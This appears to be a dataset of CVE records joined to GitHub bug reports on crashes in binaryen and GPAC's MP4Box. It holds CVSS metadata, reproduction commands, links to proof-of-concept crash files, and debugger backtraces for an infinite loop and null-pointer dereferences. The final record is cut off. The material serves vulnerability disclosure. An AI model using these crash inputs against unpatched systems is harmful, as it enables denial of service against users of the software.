0x00007ffff7c0bec4 in wasm::WasmBinaryBuilder::readGlobals() () from /home/zxq/CVE_testing/sourceproject/binaryen/bin/../lib/libbinaryen.so #5 0x00007ffff7c117d0 in wasm::WasmBinaryBuilder::read() () from /home/zxq/CVE_testing/sourceproject/binaryen/bin/../lib/libbinaryen.so #6 0x00007ffff7c3d766 in wasm::ModuleReader::readBinaryData(std::vector<char, std::allocator<char> >&, wasm::Module&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >) () from /home/zxq/CVE_testing/sourceproject/binaryen/bin/../lib/libbinaryen.so #7 0x00007ffff7c3df6c in wasm::ModuleReader::readBinary(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, wasm::Module&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >) () from /home/zxq/CVE_testing/sourceproject/binaryen/bin/../lib/libbinaryen.so #8 0x000055555555966c in main () #9 0x00007ffff6ec50b3 in __libc_start_main (main=0x555555558d40 <main>, argc=0x2, argv=0x7fffffffe248, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe238) at ../csu/libc-start.c:308 #10 0x0000555555559d4e in _start () gdb-peda$ bt #0 0x00007ffff7c1203c in wasm::WasmBinaryBuilder::visitLet(wasm::Block*) () from /home/zxq/CVE_testing/sourceproject/binaryen/bin/../lib/libbinaryen.so #1 0x00007ffff7c0a742 in wasm::WasmBinaryBuilder::readExpression(wasm::Expression*&) () from /home/zxq/CVE_testing/sourceproject/binaryen/bin/../lib/libbinaryen.so #2 0x00007ffff7c0ba5e in wasm::WasmBinaryBuilder::processExpressions() () from /home/zxq/CVE_testing/sourceproject/binaryen/bin/../lib/libbinaryen.so #3 0x00007ffff7c0bd06 in wasm::WasmBinaryBuilder::readExpression() () from /home/zxq/CVE_testing/sourceproject/binaryen/bin/../lib/libbinaryen.so #4 0x00007ffff7c0bec4 in wasm::WasmBinaryBuilder::readGlobals() () from /home/zxq/CVE_testing/sourceproject/binaryen/bin/../lib/libbinaryen.so #5 0x00007ffff7c117d0 in wasm::WasmBinaryBuilder::read() () from /home/zxq/CVE_testing/sourceproject/binaryen/bin/../lib/libbinaryen.so #6 0x00007ffff7c3d766 in wasm::ModuleReader::readBinaryData(std::vector<char, std::allocator<char> >&, wasm::Module&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >) () from /home/zxq/CVE_testing/sourceproject/binaryen/bin/../lib/libbinaryen.so #7 0x00007ffff7c3df6c in wasm::ModuleReader::readBinary(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, wasm::Module&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >) () from /home/zxq/CVE_testing/sourceproject/binaryen/bin/../lib/libbinaryen.so #8 0x000055555555966c in main () #9 0x00007ffff6ec50b3 in __libc_start_main (main=0x555555558d40 <main>, argc=0x2, argv=0x7fffffffe248, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe238) at ../csu/libc-start.c:308 #10 0x0000555555559d4e in _start () gdb-peda$ #0 0x00007ffff7c1203c in wasm::WasmBinaryBuilder::visitLet(wasm::Block*) () from /home/zxq/CVE_testing/sourceproject/binaryen/bin/../lib/libbinaryen.so #1 0x00007ffff7c0a742 in wasm::WasmBinaryBuilder::readExpression(wasm::Expression*&) () from /home/zxq/CVE_testing/sourceproject/binaryen/bin/../lib/libbinaryen.so #2 0x00007ffff7c0ba5e in wasm::WasmBinaryBuilder::processExpressions() () from /home/zxq/CVE_testing/sourceproject/binaryen/bin/../lib/libbinaryen.so #3 0x00007ffff7c0bd06 in wasm::WasmBinaryBuilder::readExpression() () from /home/zxq/CVE_testing/sourceproject/binaryen/bin/../lib/libbinaryen.so #4 0x00007ffff7c0bec4 in wasm::WasmBinaryBuilder::readGlobals() () from /home/zxq/CVE_testing/sourceproject/binaryen/bin/../lib/libbinaryen.so #5 0x00007ffff7c117d0 in wasm::WasmBinaryBuilder::read() () from /home/zxq/CVE_testing/sourceproject/binaryen/bin/../lib/libbinaryen.so #6 0x00007ffff7c3d766 in wasm::ModuleReader::readBinaryData(std::vector<char, std::allocator<char> >&, wasm::Module&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >) () from /home/zxq/CVE_testing/sourceproject/binaryen/bin/../lib/libbinaryen.so #7 0x00007ffff7c3df6c in wasm::ModuleReader::readBinary(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, wasm::Module&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >) () from /home/zxq/CVE_testing/sourceproject/binaryen/bin/../lib/libbinaryen.so #8 0x000055555555966c in main () #9 0x00007ffff6ec50b3 in __libc_start_main (main=0x555555558d40 <main>, argc=0x2, argv=0x7fffffffe248, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe238) at ../csu/libc-start.c:308 #10 0x0000555555559d4e in _start () ```
Invalid memory address dereference in wasm::WasmBinaryBuilder::visitLet(wasm::Block*)
https://api.github.com/repos/WebAssembly/binaryen/issues/4384/comments
0
2021-12-10T22:22:07Z
2021-12-14T18:11:56Z
https://github.com/WebAssembly/binaryen/issues/4384
1,077,277,832
4,384
2,886
CVE-2021-45297
2021-12-21T19:15:08.100
An infinite loop vulnerability exists in Gpac 1.0.1 in gf_get_bit_size.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1973" }, { "source": "cve@mitre.org", "tags": null, "url": "https://www.debian.org/security/2023/dsa-5411" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1973" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://www.debian.org/security/2023/dsa-5411" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:1.1.0:*:*:*:*:*:*:*", "matchCriteriaId": "56FF2AB9-517D-43A7-867E-9FB6B833194F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "835" ]
835
https://github.com/gpac/gpac/issues/1973
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you! - [Yes ] I looked for a similar issue and couldn't find any. - [ Yes] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [ Yes] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95 Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/ **Version:** ``` ./MP4Box -version MP4Box - GPAC version 1.1.0-DEV-rev1527-g6fcf9819e-master (c) 2000-2021 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io MINI build (encoders, decoders, audio and video output disabled) Please cite our work in your research: GPAC Filters: https://doi.org/10.1145/3339825.3394929 GPAC: https://doi.org/10.1145/1291233.1291452 GPAC Configuration: --static-mp4box --prefix=/home/zxq/CVE_testing/sourceproject/gpac/cmakebuild --enable-debug Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_FREETYPE GPAC_HAS_JPEG GPAC_HAS_PNG GPAC_DISABLE_3D ``` **System information** Ubuntu 20.04.1 LTS, gcc version 9.3.0 (Ubuntu 9.3.0-17ubuntu1~20.04) **command:** ``` ./bin/gcc/MP4Box -hint POC ``` **Result** ``` ... ``` **GDB information ** ``` [----------------------------------registers-----------------------------------] RAX: 0x20000 RBX: 0x80 RCX: 0xe9b05a71 RDX: 0x1 RSI: 0x6a6a6ab8 RDI: 0x6a6a6ab8 RBP: 0x5555555e1630 --> 0x1 RSP: 0x7fffffff8078 --> 0x7ffff7875506 (<gf_rtp_builder_init+2342>: mov ebx,DWORD PTR [rbp+0x90]) RIP: 0x7ffff7788927 (<gf_get_bit_size+23>: cmp eax,edi) R8 : 0x0 R9 : 0x20 (' ') R10: 0x7ffff76d955a ("gf_rtp_builder_init") R11: 0x2 R12: 0x59e R13: 0x60 ('`') R14: 0x5555555e1750 --> 0x0 R15: 0x0 EFLAGS: 0x206 (carry PARITY adjust zero sign trap INTERRUPT direction overflow) [-------------------------------------code-------------------------------------] 0x7ffff7788920 <gf_get_bit_size+16>: add ecx,0x1 0x7ffff7788923 <gf_get_bit_size+19>: mov eax,edx 0x7ffff7788925 <gf_get_bit_size+21>: shl eax,cl => 0x7ffff7788927 <gf_get_bit_size+23>: cmp eax,edi 0x7ffff7788929 <gf_get_bit_size+25>: jle 0x7ffff7788920 <gf_get_bit_size+16> 0x7ffff778892b <gf_get_bit_size+27>: mov eax,ecx 0x7ffff778892d <gf_get_bit_size+29>: ret 0x7ffff778892e: xchg ax,ax [------------------------------------stack-------------------------------------] 0000| 0x7fffffff8078 --> 0x7ffff7875506 (<gf_rtp_builder_init+2342>: mov ebx,DWORD PTR [rbp+0x90]) 0008| 0x7fffffff8080 --> 0x24a 0016| 0x7fffffff8088 --> 0xfc7 0024| 0x7fffffff8090 --> 0x32ce10ac 0032| 0x7fffffff8098 --> 0x6a6a6ab800000020 0040| 0x7fffffff80a0 --> 0x2 0048| 0x7fffffff80a8 --> 0x62 ('b') 0056| 0x7fffffff80b0 --> 0x5555555dfb90 --> 0x5555555da930 --> 0x0 [------------------------------------------------------------------------------] Legend: code, data, rodata, value Stopped reason: SIGINT 0x00007ffff7788927 in gf_get_bit_size () from /home/zxq/CVE_testing/sourceproject/momey/gpac/bin/gcc/libgpac.so.10 gdb-peda$ bt #0 0x00007ffff7788927 in gf_get_bit_size () from /home/zxq/CVE_testing/sourceproject/momey/gpac/bin/gcc/libgpac.so.10 #1 0x00007ffff7875506 in gf_rtp_builder_init () from /home/zxq/CVE_testing/sourceproject/momey/gpac/bin/gcc/libgpac.so.10 #2 0x00007ffff7a0ec5c in gf_hinter_track_new () from /home/zxq/CVE_testing/sourceproject/momey/gpac/bin/gcc/libgpac.so.10 #3 0x000055555557958b in HintFile () #4 0x000055555557d257 in mp4boxMain () #5 0x00007ffff74df0b3 in __libc_start_main (main=0x55555556d420 <main>, argc=0x3, argv=0x7fffffffe308, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe2f8) at ../csu/libc-start.c:308 #6 0x000055555556d45e in _start () gdb-peda$ ```
infinite loop in gf_get_bit_size()
https://api.github.com/repos/gpac/gpac/issues/1973/comments
2
2021-12-10T19:07:05Z
2021-12-14T10:36:54Z
https://github.com/gpac/gpac/issues/1973
1,077,148,119
1,973
2,887
CVE-2021-44918
2021-12-21T21:15:07.497
A Null Pointer Dereference vulnerability exists in gpac 1.1.0 in the gf_node_get_field function, which can cause a segmentation fault and application crash.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1968" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1968" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:1.1.0:*:*:*:*:*:*:*", "matchCriteriaId": "56FF2AB9-517D-43A7-867E-9FB6B833194F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "476" ]
476
https://github.com/gpac/gpac/issues/1968
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you! - [x] I looked for a similar issue and couldn't find any. - [x] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [x] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95 Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/ A null pointer dereference was discovered in gf_node_get_field(). The vulnerability causes a segmentation fault and application crash. **Version:** ``` MP4Box - GPAC version 1.1.0-DEV-revUNKNOWN_REV (c) 2000-2021 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io Please cite our work in your research: GPAC Filters: https://doi.org/10.1145/3339825.3394929 GPAC: https://doi.org/10.1145/1291233.1291452 GPAC Configuration: Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_JPEG GPAC_HAS_PNG GPAC_HAS_LINUX_DVB GPAC_DISABLE_3D ``` **System information** Ubuntu 20.04 focal, AMD EPYC 7742 64-Core @ 16x 2.25GHz **command:** ``` ./MP4Box -lsr poc_5 ./MP4Box -lsr poc_6 ``` [poc.zip](https://github.com/gpac/gpac/files/7693524/poc.zip) **Result** poc_5 ``` [iso file] Unknown box type dreFF in parent dinf [iso file] Missing dref box in dinf [iso file] extra box maxr found in hinf, deleting [iso file] Unknown box type FFFFFF80 in parent hinf [iso file] extra box maxr found in hinf, deleting [iso file] Unknown box type 80rak in parent moov [iso file] Incomplete box mdat - start 11495 size 860062 [iso file] Incomplete file while reading for dump - aborting parsing [iso file] Unknown box type dreFF in parent dinf [iso file] Missing dref box in dinf [iso file] extra box maxr found in hinf, deleting [iso file] Unknown box type FFFFFF80 in parent hinf [iso file] extra box maxr found in hinf, deleting [iso file] Unknown box type 80rak in parent moov [iso file] Incomplete box mdat - start 11495 size 860062 [iso file] Incomplete file while reading for dump - aborting parsing MPEG-4 LASeR Scene Parsing [1] 878696 segmentation fault ./MP4Box -lsr ./poc/poc_5 ``` poc_6 ``` [iso file] extra box maxr found in hinf, deleting [iso file] extra box maxr found in hinf, deleting [iso file] Unknown box type pm00x in parent hinf [iso file] Unknown box type 80rak in parent moov [iso file] Incomplete box mdat - start 11495 size 861258 [iso file] Incomplete file while reading for dump - aborting parsing [iso file] extra box maxr found in hinf, deleting [iso file] extra box maxr found in hinf, deleting [iso file] Unknown box type pm00x in parent hinf [iso file] Unknown box type 80rak in parent moov [iso file] Incomplete box mdat - start 11495 size 861258 [iso file] Incomplete file while reading for dump - aborting parsing MPEG-4 LASeR Scene Parsing [LASeR] memory overread - corrupted decoding [LASeR] memory overread - corrupted decoding [LASeR] memory overread - corrupted decoding [LASeR] memory overread - corrupted decoding [LASeR] memory overread - corrupted decoding [LASeR] memory overread - corrupted decoding [LASeR] memory overread - corrupted decoding [LASeR] memory overread - corrupted decoding [LASeR] memory overread - corrupted decoding ... Program received signal SIGSEGV, Segmentation fault. ``` **gdb** poc_5 ``` Program received signal SIGSEGV, Segmentation fault. 0x00007ffff784acf0 in gf_node_get_field () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA ────────────────────────────────────────────[ REGISTERS ]───────────────────────────────────────────── RAX 0x4 RBX 0x5555555df130 —▸ 0x5555555d4330 ◂— 0x0 RCX 0x5555555df310 ◂— 0x0 RDX 0x7fffffff7050 ◂— 0x4 RDI 0x0 RSI 0x7fffffff7050 ◂— 0x4 R8 0x4 R9 0x0 R10 0x7ffff775bb48 ◂— 'gf_node_get_field' R11 0x7ffff784acd0 (gf_node_get_field) ◂— endbr64 R12 0xfffffffe R13 0x5555555df290 ◂— 0x4 R14 0x7fffffff7050 ◂— 0x4 R15 0x5555555dcdc0 —▸ 0x5555555d26b0 ◂— 0x0 RBP 0x80 RSP 0x7fffffff6fa8 —▸ 0x7ffff7b5784a (lsr_read_command_list+1402) ◂— mov eax, dword ptr [rsp + 0xa4] RIP 0x7ffff784acf0 (gf_node_get_field+32) ◂— mov rax, qword ptr [rdi] ──────────────────────────────────────────────[ DISASM ]────────────────────────────────────────────── ► 0x7ffff784acf0 <gf_node_get_field+32> mov rax, qword ptr [rdi] 0x7ffff784acf3 <gf_node_get_field+35> movzx eax, word ptr [rax] 0x7ffff784acf6 <gf_node_get_field+38> test ax, ax 0x7ffff784acf9 <gf_node_get_field+41> je gf_node_get_field+144 <gf_node_get_field+144> ↓ 0x7ffff784ad60 <gf_node_get_field+144> mov eax, 0xffffffff 0x7ffff784ad65 <gf_node_get_field+149> ret 0x7ffff784ad66 nop word ptr cs:[rax + rax] 0x7ffff784ad70 <dirty_children> push r14 0x7ffff784ad72 <dirty_children+2> push r13 0x7ffff784ad74 <dirty_children+4> push r12 0x7ffff784ad76 <dirty_children+6> push rbp ──────────────────────────────────────────────[ STACK ]─────────────────────────────────────────────── 00:0000│ rsp 0x7fffffff6fa8 —▸ 0x7ffff7b5784a (lsr_read_command_list+1402) ◂— mov eax, dword ptr [rsp + 0xa4] 01:0008│ 0x7fffffff6fb0 ◂— 0x0 02:0010│ 0x7fffffff6fb8 ◂— 0x300000000 03:0018│ 0x7fffffff6fc0 ◂— 0x0 04:0020│ 0x7fffffff6fc8 —▸ 0x5555555df0b0 —▸ 0x5555555df1d0 —▸ 0x5555555df130 —▸ 0x5555555d4330 ◂— ... 05:0028│ 0x7fffffff6fd0 ◂— 0x0 ... ↓ 2 skipped ────────────────────────────────────────────[ BACKTRACE ]───────────────────────────────────────────── ► f 0 0x7ffff784acf0 gf_node_get_field+32 f 1 0x7ffff7b5784a lsr_read_command_list+1402 f 2 0x7ffff7b59914 lsr_decode_laser_unit+708 f 3 0x7ffff7b6204d gf_laser_decode_command_list+333 f 4 0x7ffff7aa1eb1 gf_sm_load_run_isom+1505 f 5 0x5555555844a8 dump_isom_scene+760 f 6 0x55555557b42c mp4boxMain+9228 f 7 0x7ffff75630b3 __libc_start_main+243 ────────────────────────────────────────────────────────────────────────────────────────────────────── pwndbg> bt #0 0x00007ffff784acf0 in gf_node_get_field () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #1 0x00007ffff7b5784a in lsr_read_command_list () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #2 0x00007ffff7b59914 in lsr_decode_laser_unit () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #3 0x00007ffff7b6204d in gf_laser_decode_command_list () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #4 0x00007ffff7aa1eb1 in gf_sm_load_run_isom () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #5 0x00005555555844a8 in dump_isom_scene () #6 0x000055555557b42c in mp4boxMain () #7 0x00007ffff75630b3 in __libc_start_main (main=0x55555556c420 <main>, argc=3, argv=0x7fffffffe188, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe178) at ../csu/libc-start.c:308 #8 0x000055555556c45e in _start () ``` poc_6 ``` Program received signal SIGSEGV, Segmentation fault. 0x00007ffff784acf0 in gf_node_get_field () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA ────────────────────────────────────────────[ REGISTERS ]───────────────────────────────────────────── RAX 0xbb RBX 0x5555555df0f0 —▸ 0x5555555d4300 ◂— 0x0 RCX 0x5555555df2d0 ◂— 0x0 RDX 0x7fffffff7000 ◂— 0xbb RDI 0x0 RSI 0x7fffffff7000 ◂— 0xbb R8 0xbb R9 0x0 R10 0x7ffff775bb48 ◂— 'gf_node_get_field' R11 0x7ffff784acd0 (gf_node_get_field) ◂— endbr64 R12 0xfffffffe R13 0x5555555df250 ◂— 0xbb R14 0x7fffffff7000 ◂— 0xbb R15 0x5555555dcd80 —▸ 0x5555555d2680 ◂— 0x0 RBP 0x40 RSP 0x7fffffff6f58 —▸ 0x7ffff7b5784a (lsr_read_command_list+1402) ◂— mov eax, dword ptr [rsp + 0xa4] RIP 0x7ffff784acf0 (gf_node_get_field+32) ◂— mov rax, qword ptr [rdi] ──────────────────────────────────────────────[ DISASM ]────────────────────────────────────────────── ► 0x7ffff784acf0 <gf_node_get_field+32> mov rax, qword ptr [rdi] 0x7ffff784acf3 <gf_node_get_field+35> movzx eax, word ptr [rax] 0x7ffff784acf6 <gf_node_get_field+38> test ax, ax 0x7ffff784acf9 <gf_node_get_field+41> je gf_node_get_field+144 <gf_node_get_field+144> ↓ 0x7ffff784ad60 <gf_node_get_field+144> mov eax, 0xffffffff 0x7ffff784ad65 <gf_node_get_field+149> ret 0x7ffff784ad66 nop word ptr cs:[rax + rax] 0x7ffff784ad70 <dirty_children> push r14 0x7ffff784ad72 <dirty_children+2> push r13 0x7ffff784ad74 <dirty_children+4> push r12 0x7ffff784ad76 <dirty_children+6> push rbp ──────────────────────────────────────────────[ STACK ]─────────────────────────────────────────────── 00:0000│ rsp 0x7fffffff6f58 —▸ 0x7ffff7b5784a (lsr_read_command_list+1402) ◂— mov eax, dword ptr [rsp + 0xa4] 01:0008│ 0x7fffffff6f60 ◂— 0x6469005453414c00 02:0010│ 0x7fffffff6f68 ◂— 0x900000000 03:0018│ 0x7fffffff6f70 ◂— 0x0 04:0020│ 0x7fffffff6f78 —▸ 0x5555555df070 —▸ 0x5555555df190 —▸ 0x5555555df0f0 —▸ 0x5555555d4300 ◂— ... 05:0028│ 0x7fffffff6f80 ◂— 0x0 ... ↓ 2 skipped ────────────────────────────────────────────[ BACKTRACE ]───────────────────────────────────────────── ► f 0 0x7ffff784acf0 gf_node_get_field+32 f 1 0x7ffff7b5784a lsr_read_command_list+1402 f 2 0x7ffff7b59914 lsr_decode_laser_unit+708 f 3 0x7ffff7b6204d gf_laser_decode_command_list+333 f 4 0x7ffff7aa1eb1 gf_sm_load_run_isom+1505 f 5 0x5555555844a8 dump_isom_scene+760 f 6 0x55555557b42c mp4boxMain+9228 f 7 0x7ffff75630b3 __libc_start_main+243 ────────────────────────────────────────────────────────────────────────────────────────────────────── pwndbg> bt #0 0x00007ffff784acf0 in gf_node_get_field () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #1 0x00007ffff7b5784a in lsr_read_command_list () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #2 0x00007ffff7b59914 in lsr_decode_laser_unit () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #3 0x00007ffff7b6204d in gf_laser_decode_command_list () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #4 0x00007ffff7aa1eb1 in gf_sm_load_run_isom () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #5 0x00005555555844a8 in dump_isom_scene () #6 0x000055555557b42c in mp4boxMain () #7 0x00007ffff75630b3 in __libc_start_main (main=0x55555556c420 <main>, argc=3, argv=0x7fffffffe138, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe128) at ../csu/libc-start.c:308 #8 0x000055555556c45e in _start () ```
Null Pointer Dereference in gf_node_get_field()
https://api.github.com/repos/gpac/gpac/issues/1968/comments
0
2021-12-10T14:52:20Z
2021-12-13T13:22:07Z
https://github.com/gpac/gpac/issues/1968
1,076,928,345
1,968
2,888
CVE-2021-44919
2021-12-21T21:15:07.543
A Null Pointer Dereference vulnerability exists in the gf_sg_vrml_mf_alloc function in gpac 1.1.0-DEV, which causes a segmentation fault and application crash.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1963" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1963" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:1.1.0:*:*:*:*:*:*:*", "matchCriteriaId": "56FF2AB9-517D-43A7-867E-9FB6B833194F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "476" ]
476
https://github.com/gpac/gpac/issues/1963
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you! - [x] I looked for a similar issue and couldn't find any. - [x] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [x] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95 Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/ A null pointer dereference was discovered in gf_sg_vrml_mf_alloc(). The vulnerability causes a segmentation fault and application crash. **Version:** ``` MP4Box - GPAC version 1.1.0-DEV-revUNKNOWN_REV (c) 2000-2021 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io Please cite our work in your research: GPAC Filters: https://doi.org/10.1145/3339825.3394929 GPAC: https://doi.org/10.1145/1291233.1291452 GPAC Configuration: Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_JPEG GPAC_HAS_PNG GPAC_HAS_LINUX_DVB GPAC_DISABLE_3D ``` **System information** Ubuntu 20.04 focal, AMD EPYC 7742 64-Core @ 16x 2.25GHz **command:** ``` ./MP4Box -lsr ./poc5 ``` [poc5.zip](https://github.com/gpac/gpac/files/7691789/poc5.zip) **Result** ``` ./MP4Box -lsr ./poc5 [iso file] extra box maxr found in hinf, deleting [iso file] extra box maxr found in hinf, deleting [iso file] Unknown 